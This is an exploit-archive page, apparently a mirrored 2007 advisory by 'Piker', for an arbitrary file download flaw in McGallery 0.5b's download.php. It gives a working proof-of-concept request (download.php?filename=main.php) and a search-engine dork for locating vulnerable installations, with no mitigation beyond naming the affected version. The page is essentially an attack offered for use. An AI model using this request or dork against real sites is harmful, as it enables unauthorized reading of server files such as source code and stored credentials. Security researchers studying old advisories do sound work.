[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : McGallery 0.5b (download.php) Arbitrary File Download Vulnerability
# Published : 2007-03-15
# Author : Piker
# Previous Title : Absolute Image Gallery 2.0 (gallery.asp categoryid) SQL Injection Vuln
# Next Title : Zomplog <= 3.7.6 Local File Inclusion Vulnerabilty (win32)


################## Piker #######################################
#
#
#    McGallery 0.5b Arbitrary File Download Vulnerability
#
#
#    Affected software: McGallery 0.5b
#    Vendor: http://sourceforge.net/projects/mcgallery/
#    Dork: allintitle: "MCgallery 0.5b"
#
################################################################
#
#    http://[target]/[path]/download.php?filename=main.php
#
################################################################
#
#                   Found by Piker
#                   The Am0s Team
#
#    Greetz: KX-T33, kakalake, nAzGuL, Putus, sn4ke
#
################################################################

# www.Syue.com [2007-03-15]